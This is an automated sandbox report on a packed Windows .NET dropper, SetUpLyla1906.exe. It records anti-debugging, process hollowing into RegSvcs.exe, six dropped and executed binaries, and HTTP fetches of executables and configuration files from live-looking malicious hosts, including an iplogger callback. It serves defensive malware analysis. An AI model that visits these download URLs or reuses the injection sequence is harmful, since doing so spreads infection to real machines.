Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	June 21, 2023, 3:57 p.m.	June 21, 2023, 4:06 p.m.

Size	1000.0KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`83ef65a424e1baf1d7b861acec54ecb4`
SHA256	`199c2d8e24c0cc919d0400773938ed3cca76860e7be93b5d1f2f8ee12004a5f7`
CRC32	`3A96DE58`
ssdeep	`12288:xCAtA8KIiEVqjmG09laoIqLtTmAGiDd4CT7s6Z46E2W0aBjbaxZAj0VQTj7nO62z:htAIi0/9EoTJmIDKgWWa5axZfVQTl`
PDB Path	/www/wwwroot/www.vecna.pw/includes/protected_files/29fc9b3a2192988f0a21e6b429158776/obj/Release/bllomsort4chill.pdb
Yara	UPX_Zero - UPX packed file Is_DotNET_EXE - (no description) PE_Header_Zero - PE File Signature Admin_Tool_IN_Zero - Admin Tool Sysinternals IsPE32 - (no description)

SetUpLyla1906.exe "C:\Users\test22\AppData\Local\Temp\SetUpLyla1906.exe"
632
- RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2304
  - 9B88LLG036LO2MA.exe https://iplogger.com/12qaJ4
    2504

Name	Response	Post-Analysis Lookup
iplogger.com	A 148.251.234.93	148.251.234.93
mynsd2u.com	A 103.8.25.128	103.8.25.128
tokoi45.beget.tech	A 5.101.152.100	5.101.152.100

IP Address	Status	Action
103.8.25.128	Active	Moloch
148.251.234.93	Active	Moloch
164.124.101.2	Active	Moloch
5.101.152.100	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49177 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49178 -> 148.251.234.93:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 148.251.234.93:443 -> 192.168.56.103:49179	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic

Suricata TLS

No Suricata TLS

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent June 21, 2023, 3:57 p.m.			0	0
IsDebuggerPresent June 21, 2023, 3:57 p.m.			0	0
IsDebuggerPresent June 21, 2023, 3:50 p.m.			0	0
IsDebuggerPresent June 21, 2023, 3:50 p.m.			0	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

/www/wwwroot/www.vecna.pw/includes/protected_files/29fc9b3a2192988f0a21e6b429158776/obj/Release/bllomsort4chill.pdb

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx June 21, 2023, 3:57 p.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (10 events)

suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://tokoi45.beget.tech/server.txt
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://tokoi45.beget.tech/server1.txt
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://tokoi45.beget.tech/server2.txt
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_1.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_2.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_3.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_4.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_5.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/1/data64_6.exe
suspicious_features	HTTP version 1.0 used	suspicious_request	GET http://mynsd2u.com/webArg1.txt

Performs some HTTP requests (10 events)

request	GET http://tokoi45.beget.tech/server.txt
request	GET http://tokoi45.beget.tech/server1.txt
request	GET http://tokoi45.beget.tech/server2.txt
request	GET http://mynsd2u.com/1/data64_1.exe
request	GET http://mynsd2u.com/1/data64_2.exe
request	GET http://mynsd2u.com/1/data64_3.exe
request	GET http://mynsd2u.com/1/data64_4.exe
request	GET http://mynsd2u.com/1/data64_5.exe
request	GET http://mynsd2u.com/1/data64_6.exe
request	GET http://mynsd2u.com/webArg1.txt

Allocates read-write-execute memory (usually to unpack itself) (50 out of 105 events)

Time & API	Arguments	Status
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74272000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 917504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00690000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73522000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x741eb000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee1000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72ee2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 524288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005f0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00630000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00512000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00545000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7411a000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00900000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0051a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00536000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00901000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00537000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d9f000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d51000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 49152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00902000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0090e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0090f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x74104000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cb0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 24576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cb1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cb7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00cb8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d01000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000a90000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000b70000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2491000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2b2b000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 region_size: 1376256 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00000000024a0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000002570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory June 21, 2023, 3:50 p.m.	process_identifier: 2504 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fef2492000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Local\Temp\9AAF736I9CHNODK.exe
file	C:\Users\test22\AppData\Local\Temp\0KN0M747AQ6H7KK.exe
file	C:\Users\test22\AppData\Local\Temp\H21INLA47IJ9C9C.exe
file	C:\Users\test22\AppData\Local\Temp\H29C9C2NBN6AQI2.exe
file	C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe
file	C:\Users\test22\AppData\Local\Temp\I1O3AP838FI35GL.exe

Drops a binary and executes it (6 events)

file	C:\Users\test22\AppData\Local\Temp\H21INLA47IJ9C9C.exe
file	C:\Users\test22\AppData\Local\Temp\I1O3AP838FI35GL.exe
file	C:\Users\test22\AppData\Local\Temp\9AAF736I9CHNODK.exe
file	C:\Users\test22\AppData\Local\Temp\0KN0M747AQ6H7KK.exe
file	C:\Users\test22\AppData\Local\Temp\H29C9C2NBN6AQI2.exe
file	C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 2508 thread_handle: 0x00000128 process_identifier: 2504 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe track: 1 command_line: https://iplogger.com/12qaJ4 filepath_r: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001b4	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x000ce800', u'virtual_address': u'0x00002000', u'entropy': 7.778606262868426, u'name': u'.text', u'virtual_size': u'0x000ce7b8'}

entropy

7.77860626287

description

A section with a high entropy has been found

entropy

0.826413206603

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW June 21, 2023, 3:57 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (10 events)

description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications use DNS	rule	Network_DNS
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

One or more of the buffers contains an embedded PE file (2 events)

buffer	Buffer with sha1: 8a7a16e1bb29ef6a29ec7e71bdc776d6bdfda170
buffer	Buffer with sha1: 4eb2412762de359e62890961387d8d1357d666ba

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 2304 region_size: 598016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b0	1	0	0

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA June 21, 2023, 3:50 p.m.	key_handle: 0x0000000000000414 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Potential code injection by writing to the memory of another process (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $],~DMMMR5 MR5¯MR5M¦1 M¦1M¦1JMR5MM»MÀ0MÀ0MRichMPELÖÔdà#@¼àCP@ @[PÐüL8P @Pä.texto>@ `.rdata(PD@@.dataVpBZ@À.relocüLÐN@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x000002b0	1	1	0
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2304 process_handle: 0x000002b0	1	1	0

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $],~DMMMR5 MR5¯MR5M¦1 M¦1M¦1JMR5MM»MÀ0MÀ0MRichMPELÖÔdà#@¼àCP@ @[PÐüL8P @Pä.texto>@ `.rdata(PD@@.dataVpBZ@À.relocüLÐN@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x000002b0	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 632 called NtSetContextThread to modify thread in remote process 2304
NtSetContextThread June 21, 2023, 3:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4277216 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002ac process_identifier: 2304	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 632 resumed a thread in remote process 2304
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2304	1	0	0

Generates some ICMP traffic

Executed a process and injected code into it, probably while unpacking (33 events)

Time & API	Arguments	Status	Return
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x0000017c suspend_count: 1 process_identifier: 632	1	0
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x000001f0 suspend_count: 1 process_identifier: 632	1	0
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x00000238 suspend_count: 1 process_identifier: 632	1	0
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x0000029c suspend_count: 1 process_identifier: 632	1	0
NtGetContextThread June 21, 2023, 3:57 p.m.	thread_handle: 0x00000180	1	0
NtGetContextThread June 21, 2023, 3:57 p.m.	thread_handle: 0x00000180	1	0
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x00000180 suspend_count: 1 process_identifier: 632	1	0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 2308 thread_handle: 0x000002ac process_identifier: 2304 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000002b0	1	1
NtGetContextThread June 21, 2023, 3:57 p.m.	thread_handle: 0x000002ac	1	0
NtAllocateVirtualMemory June 21, 2023, 3:57 p.m.	process_identifier: 2304 region_size: 598016 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000002b0	1	0
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $],~DMMMR5 MR5¯MR5M¦1 M¦1M¦1JMR5MM»MÀ0MÀ0MRichMPELÖÔdà#@¼àCP@ @[PÐüL8P @Pä.texto>@ `.rdata(PD@@.dataVpBZ@À.relocüLÐN@B base_address: 0x00400000 process_identifier: 2304 process_handle: 0x000002b0	1	1
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: base_address: 0x00401000 process_identifier: 2304 process_handle: 0x000002b0	1	1
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: base_address: 0x00465000 process_identifier: 2304 process_handle: 0x000002b0	1	1
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: base_address: 0x00487000 process_identifier: 2304 process_handle: 0x000002b0	1	1
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: base_address: 0x0048d000 process_identifier: 2304 process_handle: 0x000002b0	1	1
WriteProcessMemory June 21, 2023, 3:57 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2304 process_handle: 0x000002b0	1	1
NtSetContextThread June 21, 2023, 3:57 p.m.	registers.eip: 0 registers.esp: 0 registers.edi: 0 registers.eax: 4277216 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x000002ac process_identifier: 2304	1	0
NtResumeThread June 21, 2023, 3:57 p.m.	thread_handle: 0x000002ac suspend_count: 1 process_identifier: 2304	1	0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\H21INLA47IJ9C9C.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\H21INLA47IJ9C9C.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\I1O3AP838FI35GL.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\I1O3AP838FI35GL.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\9AAF736I9CHNODK.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\9AAF736I9CHNODK.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
